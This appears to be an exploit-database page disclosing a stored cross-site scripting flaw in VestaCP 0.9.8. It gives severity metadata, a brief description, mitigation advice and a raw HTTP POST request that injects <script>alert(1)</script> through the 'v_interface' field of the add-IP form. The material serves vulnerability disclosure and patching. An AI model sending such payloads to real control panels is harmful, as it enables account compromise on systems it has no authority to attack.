VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS

vendor:

VestaCP

by:

Numan Türle

8.8

CVSS

HIGH

Stored XSS

CWE

Product Name: VestaCP

Affected Version From: 0.9.8-26-43

Affected Version To: 0.9.8-26

Patch Exists: YES

Related CWE: N/A

CPE: a:vestacp:vestacp:0.9.8-26-43

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: VestaCP

2021

VestaCP 0.9.8 – ‘v_interface’ Add IP Stored XSS

VestaCP 0.9.8 is vulnerable to stored XSS in the 'v_interface' parameter of the 'add/ip/' POST request. An attacker can inject malicious JavaScript code into the 'v_interface' parameter, which will be executed when the user visits the 'add/ip/' page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'v_interface' parameter. Additionally, the application should be updated to the latest version of VestaCP.

Source

Exploit-DB raw data:

# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage: https://vestacp.com
# Software Link: https://myvestacp.com < 0.9.8-26-43
# Software Link: https://vestacp.com < 0.9.8-26
# Tested on: VestaCP

POST /add/ip/ HTTP/1.1
Host: TARGET:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://TARGET:8083
Content-Type: application/x-www-form-urlencoded
User-Agent: USER-AGENT
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://TARGET:8083/add/ip/
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;
Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0
sec-gpc: 1

token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add